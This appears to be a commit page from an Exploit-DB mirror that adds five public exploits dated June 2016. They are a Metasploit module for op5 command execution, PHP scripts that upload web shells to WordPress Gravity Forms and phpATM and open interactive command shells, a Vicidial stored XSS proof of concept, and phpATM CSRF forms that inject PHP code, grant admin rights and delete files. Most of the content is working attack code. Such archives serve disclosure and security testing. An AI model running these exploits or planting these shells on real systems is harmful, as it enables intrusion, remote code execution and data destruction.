bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-18

Browse source 
5 new exploits

WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload
Vicidial 2.11 - Scripts Stored XSS
phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers
phpATM 1.32 - Multiple Vulnerabilities
op5 v7.1.9 Configuration Command Execution
This commit is contained in:
Offensive Security 2016-06-18 05:02:53 +00:00
parent 2815f48e25
commit 929e1cb538
6 changed files with 648 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -36151,3 +36151,8 @@ id,file,description,date,author,platform,type,port
39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443

Can't render this file because it is too large.

132
platforms/linux/remote/39973.rb Executable file
View file

@ -0,0 +1,132 @@
##
## This module requires Metasploit: http://metasploit.com/download
## Current source: https://github.com/rapid7/metasploit-framework
###
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
Rank = ExcellentRanking
def initialize(info = {})
super(
update_info(
info,
'Name' => 'op5 v7.1.9 Configuration Command Execution',
'Description' => %q(
op5 an open source network monitoring software.
The configuration page in version 7.1.9 and below
allows the ability to test a system command, which
can be abused to run arbitrary code as an unpriv user.
),
'Author' =>
[
'h00die <mike@shorebreaksecurity.com>', # module
'hyp3rlinx' # discovery
],
'References' =>
[
[ 'EDB', '39676' ],
[ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Privileged' => false,
'DefaultOptions' => { 'SSL' => true },
'Targets' =>
[
[ 'Automatic Target', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 08 2016'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
], self.class
)
end
def check
begin
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
)
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
/Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
vprint_good("Version Detected: #{version}")
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def exploit
execute_cmdstager(
:flavor => :echo
)
end
def execute_command(cmd, opts)
begin
# To manually view the vuln page, click Manage > Configure > Commands.
# Click the "Test this command" button to display the form we abuse.
# login
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
'method' => 'POST',
'vars_get' =>
{
'uri' => 'tac/index'
},
'vars_post' =>
{
'csrf_token' => '',
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
cookie = res.get_cookies
# exploit
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
'method' => 'GET',
'cookie' => cookie,
'vars_get' =>
{
'cmd_str' => cmd
}
)
# success means we hang our session, and wont get back a response
if res
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
end
def on_new_session(session)
super
session.shell_command_token('setsid $SHELL')
end
end

53
platforms/php/webapps/39969.php Executable file
View file

@ -0,0 +1,53 @@
<?php
# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload
# Vendor Homepage: http://www.gravityforms.com/
# Vulnerable Version(s): 1.8.19 (and below)
# Exploit Author: Abk Khan
# Contact: [ an0nguy @ protonmail.ch ]
# Website: http://blog.lolwaleet.com/
# Category: webapps
# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!
error_reporting(0);
$domain = 'http://localhost/wordpress';
$url = "$domain/?gf_page=upload";
$shell = "$domain/wp-content/_input_3_khan.php5";
$separator = '-----------------------------------------------------';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);
if (eregi('ok', $response)) {
echo "$separator\nShell at $shell\n$separator\n\n";
while ($testCom != 'bubye!') {
$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
echo "$user@b0x:~$ ";
$handle = fopen("php://stdin", 'r');
$testCom = trim(fgets($handle));
fclose($handle);
$comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
echo $comOut;
}
}
else {
die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
}
function get_string_between($string, $start, $end)
{
# stolen from stackoverflow!
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
?>

63
platforms/php/webapps/39970.txt Executable file
View file

@ -0,0 +1,63 @@
# Exploit Title: Vicidial 2.11 Scripts - Authenticated Stored XSS
# Date: 0 day
# Exploit Author: David Silveiro
# Exploit Author Github: github.com/davidsilveiro
# Vendor Homepage: http://vicidial.org
# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
Vicidial is a popular opensource software, used throughout many different sectors,
such as; call centers for inbound & outband calling.
The vulnerablility is triggered when an authenticated with user sufficient permissions,
creates a script (small text document that the agents use for remembering lines)without
sufficient sanitization happening within "Script Name" and "Script Text". Due to the nature
of how widely this script can be set, for example a whole Tele-marketing campaign or specific
agent, it could very easily be used to infect other hosts on the Network.
POC:
http://localhost.com/vicidial_demo/admin.php?ADD=1111111
POST Data (script_name & script_text);
ADD=2111111&DB=&script_id=tests&script_name=<script>alert('XSS!'</script>&script_comments=test&
active=Y&user_group=---ALL---&selectedField=fullname&script_text=<script>alert('XSS 2!'</script>&SUBMIT=SUBMIT
Click 'Preview Script'
<html>
<head></head>
<body bgcolor="white" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">
<font size="2" color="BLACK" face="ARIAL,HELVETICA">
<font size="2" color="BLACK" face="ARIAL,HELVETICA">
Preview Script: 1017
<br></br>
<table width="600">
<tbody>
<tr>
<td>
<center>
<script>
alert('XSS!')
</script>
<br></br>
</center>
<script>
alert('XSS 2!')
</script>
</td>
</tr>
</tbody>
</table>
</font>
</font>
</body>
</html>

220
platforms/php/webapps/39971.php Executable file
View file

@ -0,0 +1,220 @@
<?php
/*
Exploit Title : "phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers"
Date : 17/06/2016
Author : Paolo Massenio - pmassenio[AT]gmail
Vendor : phpATM - http://phpatm.org/
Version : <= 1.32
Tested on : Windows 10 with XAMPP
__PoF__
"phpATM is the acronym for PHP Advanced Transfer Manager and is a free, open source, PHP based Upload and Download manager.
But unlike most other of its kind it stores the data in flat text files and therefore does not require a database
like MySQL installed on the web server."
The bugged code is in the upload function.
Generally phpATM lets you to register, and then upload some files (no admin privileges required).
The hacking prevention is setted up by a regular expression to avoid .php files upload:
----index.php----
[...]
1544 // Try if file exists Or file is script
1545 if (file_exists("$destination/$userfile_name") ||
1546 eregi($rejectedfiles, $userfile_name) || <--- here the regex
[...]
-----------------
----conf.php----
[...]
307 $rejectedfiles = "^index\.|\.desc$|\.fdesc$|\.dlcnt$|\.vcnt$|\.php$|\.php\..*|\.php3$|\.php3\..*|\.cgi\..*|\.cgi$|\.pl$\.pl\..*|\.php4$|\.ns|\.inc$|\.php5";
[...]
----------------
So if we can upload a file with a space at the end, like this: "shell.php ",
and the file system is running under Microsoft Windows, we can bypass the eregi,
reaching the target to upload a php script file(like a shell)!
The basic requirement is that the server is a Windows based server!
You can upload the shell using a local proxy, like burp suite, or use the exploit below.
*/
if(!isset($argv[1]) && !isset($argv[2]) && !isset($argv[3])){
printInfo();
exit;
}
echo "[+] OK trying to get the PHPSESSID.\n";
$sessid = getPhpsessid($argv[1],$argv[2],$argv[3]);
echo "[+] PHPSESSID for user '".$argv[2]."' grabbed (".$sessid.")\n";
echo "[+] trying to upload the shell.\n";
$shellname = uploadShell($argv[1],$sessid);
echo "[+] OK shell is here: ".$argv[0]."/files/".trim($shellname)."?cmd=command\n\n";
echo "[*] Do you want to run an interactive shell ? [Y/N] ";
$line = fgets(STDIN);
if(trim($line) == 'Y'){
runConsole($argv[1],$shellname);
}
echo "[+] bye\n";
function printInfo(){
$intro = "[*] phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers\n".
"[*] Founded and coded by Paolo Massenio\n".
"[***] The basic requirement is that the server is a Windows based server!\n".
"[*] usage: php ".$argv[0]." server username password\n".
"[*] Where:\n".
"[*] server is the server with the correct path to phpATM\n".
"[*] username and password are the credentials for the user with 'NORMAL USER' privileges\n".
"[*] cmd is the command you want to execute (OPTIONAL)\n".
"[*] e.g. : php ".$argv[0]." http://site.com/phpATM/ test test\n";
echo $intro;
}
function parseHeaders( $headers )
{
$head = array();
foreach( $headers as $k=>$v )
{
$t = explode( ':', $v, 2 );
if( isset( $t[1] ) )
$head[ trim($t[0]) ] = trim( $t[1] );
else
{
$head[] = $v;
if( preg_match( "#HTTP/[0-9\.]+\s+([0-9]+)#",$v, $out ) )
$head['reponse_code'] = intval($out[1]);
}
}
return $head;
}
function getPhpsessid($server,$user,$pass){
$url = $server.'/login.php';
$data = array('action' => 'userlogin', 'user_name' => $user, 'user_pass' => $pass, 'Submit' => 'Enter');
$options = array(
'http' => array(
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data)
)
);
$result = file_get_contents($url, false, stream_context_create($options));
$r_header = parseHeaders($http_response_header);
if ($result === FALSE) {
die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
}
if(!isset($r_header['Location'])){
die("[-] You didn't entered a correct pair user/password.");
}
if(strpos($r_header['Server'],'Win') === false){
die("[-] The server isn't running on Windows. Can't run the exploit.");
}
$sessid = trim(substr(strstr($r_header['Location'],'PHPSESSID'),10));
return $sessid;
}
function uploadShell($server,$phpsessid){
$MULTIPART_BOUNDARY= '--------------------------'.microtime(true);
$shellname = "0x".rand()."_gh0st.php "; //notice the space after .php
$header = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n";
$header .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$header .="Accept-Encoding: gzip, deflate\r\n";
$header .= "Cookie: PHPSESSID=$phpsessid\r\n";
$header .="Connection: close\r\n";
$header .= "Content-Type: multipart/form-data; boundary=$MULTIPART_BOUNDARY";
$content = "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
"upload\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"directory\"\r\n\r\n".
"\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"order\"\r\n\r\n".
"nom\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"direction\"\r\n\r\n".
"0\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"userfile\"; filename=\"$shellname\"\r\n".
"Content-Type: application/octet-stream\r\n\r\n".
"<?php exec(\$_GET['cmd']); ?>\r\n";
$content .= "--$MULTIPART_BOUNDARY\r\n".
"Content-Disposition: form-data; name=\"description\"\r\n\r\n".
"\r\n";
$content .= "--$MULTIPART_BOUNDARY--\r\n";
$options = array(
'http' => array(
'method' => 'POST',
'header' => $header,
'content' => $content,
)
);
$url = $server.'/index.php?';
$result = file_get_contents($url, false, stream_context_create($options));
$r_header = parseHeaders($http_response_header);
if ($result === FALSE) {
die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
}
if(!isset($r_header['reponse_code']) && intval($r_header['reponse_code']) != 200){
die("[-] Error during upload.");
}
return $shellname;
}
function runConsole($server,$shellname){
while(1){
echo "Insert cmd ('exit' to quit) > ";
$cmd = fgets(STDIN);
if(trim($cmd) == 'exit' ) die("[+] bye\n");
$query = $server."/files/".trim($shellname)."?cmd=".trim($cmd);
$result = file_get_contents($query);
echo $result."\n";
}
}
?>

175
platforms/php/webapps/39972.txt Executable file
View file

@ -0,0 +1,175 @@
<!--
Exploit Title : "phpATM <= 1.32 Multiple CSRF Vulnerabilities & Full Path Disclosure Vulnerability"
Date : 17/06/2016
Author : Paolo Massenio - pmassenio[AT]gmail
Vendor : phpATM - http://phpatm.org/
Version : <= 1.32
Tested on : Windows 10 with XAMPP
[1] __CSRF in configure.php__
phpATM lets the administrator to modify the footer or the header through a specific form located in configure.php.
The configure.php page and all of the forms in it are affected by a CSRF bug, so we will focus on the form that
lets you to modify the footer.
This section of code is called when this form is submitted:
---configure.php---
149 case ACTION_SAVEFILE;
$filename = getPostVar('filename');
$filebody = getPostVar('filebody');
if (!isset($filebody))
{ break; }
$filebody = stripslashes($filebody);
$filebody = str_replace("&", "&", $filebody);
$filebody = preg_replace('/[^\x09\x0A\x0D\x20-\x7F]/e', '"&#".ord($0).";"', $filebody);
$fp=@fopen("$cfg_folder_name/$filename","w+");
fwrite($fp, $filebody);
fclose($fp);
show_default(sprintf($mess[167], $filename));
163 break;
-------------------
All the content is saved in the file (e.g. $filename="footer.html").
For example, the footer is included in every page by the show_footer_page() function, like in the index.php page:
---index.php---
[...]
1860 show_footer_page();
[...]
------------------
Let see this function:
---functions.php---
[...]
951 function show_footer_page()
{
global $footerpage, $include_location, $cfg_folder_name; //$footerpage="footer.html"
// The copyright info. Please read GPL license if you are planning to remove it.
echo "\n<div id=\"phpatm\"><br><a href=\"http://phpatm.org/\" target=\"_blank\" title=\"Powered by PHP Advanced Transfer Manager v".PROGRAM_VERSION."\">Powered by phpATM</a><br></div>\n";
// Include the footer page if configured
$footer_path = $include_location.$cfg_folder_name.'/'.$footerpage;
if (file_exists($footer_path))
{ include($footer_path); }
echo "</div></td>\n</tr>\n</table>\n</body>\n</html>";
964 }
[...]
-------------------
So the footer.html is included! We can write whatever we want.
We can basically inject,through the CSRF, some malicius html code (e.g. persistent XSS)
or a malicious PHP code!
Below a very simple example that injects malicious PHP code:
<body onload="document.editfile.submit()">
<form name="editfile" action="http://127.0.0.1/phpATM/configure.php?" method="post">
<input type="hidden" name="action" value="savefile">
<input type="hidden" name="filename" value="footer.htm">
<input type="hidden" name="filebody" value='<?php system($_GET["cmd"]); ?>'>
</form>
</body>
[2] __CSRF in usrmanag.php (1) change user permission__
phpATM lets the administrator to change permission of a generic registered user through a form located in usrmanag.php page.
This page and all of the forms in it are affected by a CSRF bug.
The code below lets to the evil user to modify the permissions:
<body onload="document.useraccount.submit()">
<form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" >
<input type="hidden" name="action" value="profile">
<input type="hidden" name="order" value="name">
<input type="hidden" name="letter" value="">
<input type="hidden" name="accpage" value="">
<input type="hidden" name="username" value="test">
<input type="hidden" name="typed_email" value="test@mailinator.com">
<input type="hidden" name="typed_status" value="0">
</form>
</body>
username is the name of the evil user
typed_email is the email of the evil user
typed_status setted to 0 for administrator permissions.
[3] __CSRF in usrmanag.php (2) - delete any file___
phpATM doesn't use any kind of DBMS. The data of the users are collected in some files located in the 'users' folder.
Basically all the informations about a specified user (like username, md5 password, email, etc.) are stored in a file named
like the user.
In usrmanag.php the admin can delete an user account. So the system will basically delete the respective file.
When the form is submitted, is called the change_account_data() function:
----usrmanag.php----
[...]
function change_account_data()
{
[...]
if (isset($deleteaccountcheckbox))
{
if ($deleteaccountcheckbox == "on")
{
unlink("$users_folder_name/$username"); // Delete account file
if (file_exists("$userstat_folder_name/$username.stat"))
{ unlink("$userstat_folder_name/$username.stat"); } // Delete account statistics file
return;
}
}
[...]
}
-------------------
There is no sanification of the $username variable, in fact:
----usrmanag.php----
[...]
$username = getPostVar('username');
[...]
--------------------
----functions.php-----
[...]
function getPostVar($var_name)
{
if (isset($_POST[$var_name]))
{ return $_POST[$var_name]; }
else
{ return $HTTP_POST_VARS[$var_name]; }
}
[...]
--------------------
The form is affected by a CSRF bug, the $username variable isn't saificated, so we can delete
any file by sending a malicious form to the logged Admin!
Here an example:
<body onload="document.useraccount.submit()">
<form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" style="margin: 0">
<input type="hidden" name="action" value="profile">
<input type="hidden" name="username" value="../index.php">
<input type="hidden" name="deleteaccountcheckbox" value="on">
</form>
</body>
[4] __FPD__
Simply request the page: http://server/phpATM/index.php?action=view&filename[]=
->